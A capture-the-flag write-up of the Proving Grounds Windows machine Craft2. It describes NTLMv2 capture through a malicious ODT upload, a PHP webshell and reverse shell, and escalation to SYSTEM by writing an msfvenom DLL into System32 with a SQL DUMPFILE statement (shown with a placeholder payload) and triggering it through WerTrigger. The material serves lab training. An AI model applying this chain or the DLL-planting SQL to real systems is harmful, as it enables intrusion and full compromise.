May 5, 2025

Craft2 Proving Grounds Write-Up

Proving Grounds Craft2 machine walkthrough

SUMMARY

This write-up covers the Craft2 machine from OffSec's Proving Grounds, a multi-stage Windows machine whose foothold comes from abusing an ODT file upload and whose privilege escalation relies on a MySQL file write.

A file upload portal on port 80 only accepted ODT files. Using badodt.py, a malicious ODT was generated that references a resource on the attacker's host, so that when the document is opened on the target the opening application authenticates over SMB to the attacker's listener, capturing the NTLMv2 challenge-response of the user thecybergeek. Note that a captured Net-NTLMv2 response cannot be passed the way an NT hash can; it has to be cracked, which is why the next step is offline cracking. The response was cracked with john, and the recovered credentials were used to enumerate SMB shares. A writable WebApp share was found containing the PHP web root, allowing a PHP webshell to be placed and then requested through the browser for command execution and a reverse shell.

For privilege escalation, a Ligolo tunnel was established to reach port 3306, which is only bound internally. Accessing phpMyAdmin as root without a password enabled writing arbitrary bytes to disk via MySQL's SELECT ... INTO DUMPFILE. A malicious DLL was crafted with msfvenom and written to C:\Windows\System32 as phoneinfo.dll using this technique; the file is written by the MySQL server process, so this only lands in System32 because the database service runs with sufficient privileges. Combined with the WerTrigger exploit (placing Report.wer and WerTrigger.exe in the same directory), executing WerTrigger.exe caused the Windows Error Reporting service to load the planted DLL, returning a shell as NT AUTHORITY\SYSTEM.
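The DUMPFILE write described above, as an added illustration that is not taken from the original write-up or from the WerTrigger project: the pre-checks a practitioner runs before attempting the write, followed by the write itself. The hex literal is a placeholder standing in for the msfvenom-generated DLL (only the first bytes of a PE header are shown), and the target path is the one the write-up names.

```sql
-- Preconditions worth checking first. If any of these fails, the write will
-- error out and there is no point uploading a multi-kilobyte hex literal.
SELECT @@secure_file_priv;        -- '' allows writes anywhere; NULL disables them; a path restricts them
SHOW GRANTS FOR CURRENT_USER();   -- the global FILE privilege is required
SELECT @@version_compile_os;      -- confirms a Windows server, so the path uses backslashes

-- The target must not already exist: MySQL refuses to overwrite an existing file.
-- LOAD_FILE() returns NULL when the file is absent (or unreadable).
SELECT LOAD_FILE('C:\\Windows\\System32\\phoneinfo.dll') IS NULL AS target_absent;

-- The write. INTO DUMPFILE emits a single value verbatim with no line terminator,
-- escaping or column separator, which is what keeps a PE file intact; INTO OUTFILE
-- would append a newline and escape bytes, corrupting the binary.
-- 0x4d5a9000... is a placeholder: in practice it is the full hex of the DLL
-- produced by msfvenom (e.g. via xxd -p file.dll | tr -d '\n').
SELECT 0x4d5a90000300000004000000ffff0000
    INTO DUMPFILE 'C:\\Windows\\System32\\phoneinfo.dll';
```

Two caveats that the write-up's outcome depends on: the file is created by the MySQL server process, so it inherits that service account's permissions (a write into System32 requires the service to run as SYSTEM or an administrator), and the hex literal must be sent as one statement, so check max_allowed_packet against the DLL size before sending it.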


PATH TO FOLLOW

  1. Reconnaissance & ODT Upload Discovery
  2. Malicious ODT Crafting & NTLMv2 Hash Capture
  3. Hash Cracking & SMB Enumeration
  4. PHP Webshell Upload to Writable WebApp Share
  5. Reverse Shell via Web Execution
  6. Ligolo Tunnel Setup for Internal Port Access
  7. phpMyAdmin Root Access & SQL FILE Write
  8. Malicious DLL Drop to System32 via SQL
  9. WerTrigger Exploit & Shell as NT AUTHORITY\SYSTEM

Due to OffSec's policy on content sharing, these write-ups will provide hints only rather than full solutions. I know, boring stuff.